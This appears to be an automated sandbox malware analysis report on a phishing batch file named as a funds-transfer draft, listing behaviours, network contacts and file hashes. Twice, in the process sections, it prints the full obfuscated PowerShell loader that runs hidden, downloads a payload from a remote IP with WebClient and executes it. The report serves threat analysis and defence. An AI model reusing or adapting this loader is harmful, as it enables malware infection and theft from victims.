Malware Analysis Report

2025-08-05 22:19

Sample ID 240610-txvdhstdlp
Target CBQ Funds transfer DraftUdkikspostens44.bat
SHA256 7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9

Threat Level: Likely malicious

The file CBQ Funds transfer DraftUdkikspostens44.bat was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 16:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 16:26

Reported

2024-06-10 16:32

Platform

win10v2004-20240508-en

Max time kernel

298s

Max time network

293s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"

Network

Country Destination Domain Proto
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
US 52.111.229.43:443 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp

Files

memory/3924-2-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp

memory/3924-3-0x0000012E1C550000-0x0000012E1C572000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e1uigytw.gzo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3924-13-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp

memory/3924-14-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp

memory/3924-15-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp

memory/3924-16-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp

memory/3924-17-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp

memory/3924-18-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 16:26

Reported

2024-06-10 16:32

Platform

win11-20240508-en

Max time kernel

297s

Max time network

293s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"

Network

Country Destination Domain Proto
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp
BG 194.59.31.187:80 tcp

Files

memory/2796-2-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqzed1ta.o2i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2796-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2796-12-0x0000023EA8060000-0x0000023EA8082000-memory.dmp

memory/2796-13-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2796-14-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2796-15-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/2796-16-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2796-17-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp